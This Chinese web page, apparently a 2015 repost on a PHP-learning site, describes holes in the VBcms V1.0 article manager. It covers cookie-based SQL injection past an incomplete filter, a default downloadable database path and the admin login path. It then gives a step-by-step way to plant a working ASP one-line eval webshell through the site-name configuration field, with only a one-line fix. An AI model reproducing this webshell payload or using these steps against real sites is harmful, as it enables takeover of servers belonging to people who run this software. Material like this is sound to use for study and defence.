VBcms文章管理系统V 1.0漏洞及修复 - 网站安全 - 自-自学php网

主页 > 后端 > 网站安全 >

VBcms文章管理系统V 1.0漏洞及修复 - 网站安全 - 自

来源：自学PHP网时间：2015-04-17 14:47 作者：阅读:次

[导读] Author:mer4en7y下午遇到这个CMS，于是看了看代码Check_SqlIn.asp防注入代码未过滤完全注入漏洞：1）未对cookie方式进行过滤,cookie注入2）默认数据库：data/article.mdb3）后台拿shell:后台地址:admi...

Author:mer4en7y

下午遇到这个CMS，于是看了看代码

Check_SqlIn.asp防注入代码未过滤完全注入漏洞：

1）未对cookie方式进行过滤,cookie注入

2）默认数据库：
data/article.mdb

3）后台拿shell:
后台地址:admin/login.asp

系统配置-->网站名称处写入："<script language=VBScript runat=server>eval request("1")</script>"

一句话地址:http://www.2cto.com /admin/config.asp

修复：
修改默认下载地址，过滤

微创信息发布系统后台绕过漏洞及修复方案 - 网

提权后获取linux root密码 - 网站安全 - 自学php

最新评论

加载更多~~

添加评论

更多文章推荐

探测网站(一)burp suite探测Web目录 - 网站安全 - 自 2015-04-17
DZx2.0 密码记录 - 网站安全 - 自学php 2015-04-17
QQ秀页面的三个URL参数没有过滤../导致跨目录浏览 2015-04-17
“组策略”中的{远程控制软件} - Windows操作系统 2015-04-17
酷6两个注射点 - 网站安全 - 自学php 2015-04-17
火眼金睛找不同：文件比较大练兵 - Windows操作系 2015-04-17
那些年我们一起学XSS - 3. 输出在HTML属性里的情况 2015-04-17
my.2345.com注射漏洞 - 网站安全 - 自学php 2015-04-17
提权后获取linux root密码 - 网站安全 - 自学php 2015-04-17
Wordpress插件NOSpamPTI盲注 - 网站安全 - 自学php 2015-04-17

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习，以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明：本站所有视频，教程都由网友上传，站长收集和分享给大家学习使用，如由牵扯版权问题请联系站长邮箱904561283@qq.com



添加评论